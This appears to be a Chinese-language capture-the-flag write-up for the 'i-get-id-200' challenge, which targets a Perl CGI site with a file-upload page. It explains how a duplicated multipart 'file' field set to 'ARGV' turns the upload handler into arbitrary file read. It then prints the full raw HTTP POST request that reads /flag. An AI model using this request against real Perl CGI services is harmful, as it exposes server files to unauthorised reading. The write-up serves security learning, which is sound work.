XCTF-i-get-id-200

i-get-id-200

• 题目描述

  嗯。。我刚建好了一个网站

• 解题过程

  一共有三个页面

  • Hello World

    告诉了页面是perl写的

  • Forms

    输入name和age会返回渲染后的字符串

    搜了一下，perl不能ssti

  • File

    可以上传文件，上传成功后会打印文件内容

    感觉上传文件这里有漏洞，但是对perl环境很陌生，去看看相关的用法

  • 文件读取，并打印文件内容

    open(DATA, "<file.txt") or die "file.txt 文件无法打开, $!";
    # DATA 为文件句柄用于读取文件
    while(<DATA>){
       print "$_";
    }
    

  • 文件上传

     #!/usr/bin/perl
     use CGI;
     my $cgi = new CGI;
     my $dir = 'sub';
     my $file = $cgi->param('file');
     $file=~m/^.*(\|/)(.*)/;
     # strip the remote path and keep the filename
     my $name = $2;
     open(LOCAL, ">$dir/$name") or print 'error';
     while(<$file>) {
        print LOCAL $_;
     }
     print $cgi->header();
     print $dir/$name;
     print "$file has been successfully uploaded... thank you.
    ";enter code here
    

    没什么思路，去看了wp，网上wp清一色猜测后端代码。。。

    找到了源码（节选）

    if ($cgi->upload('file')) {
        my $file = $cgi->param('file');
        while (<$file>) {
            print "$_";
            print "<br />";
        }
    }
    

    涉及几个知识点：

    • 这里需要用到ARGV，它是perl默认用来接收参数的数组，类似flask的request.argv
    • $cgi->param('file');会优先选取第一个file参数，类似于参数污染
    • 结合起来就会达到<$file> == ARGV[0]的效果，可以进行任意文件读取了

    POST /cgi-bin/file.pl?/flag HTTP/1.1
    Host: 220.249.52.133:57967
    Content-Length: 411
    Cache-Control: max-age=0
    Origin: http://220.249.52.133:57967
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAcRiYZHdukQ6xuzQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://220.249.52.133:57967/cgi-bin/file.pl?file=../file.pl
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    
    ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
    Content-Disposition: form-data; name="file"
    Content-Type: text/plain
    
    ARGV
    ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
    Content-Disposition: form-data; name="file"; filename="draft.txt"
    Content-Type: text/plain
    
    asdasd
    ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
    Content-Disposition: form-data; name="Submit!"
    
    Submit!
    ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ--
    
    

    注意这里需要多加一组form数据来写ARGV

• 参考

  • https://www.runoob.com/perl/
  • https://stackoverflow.com/questions/7770176/perl-script-for-file-upload
  • https://github.com/ctfs/write-ups-2016/blob/master/csaw-ctf-2016-quals/web/i-got-id-200/cgi/file.pl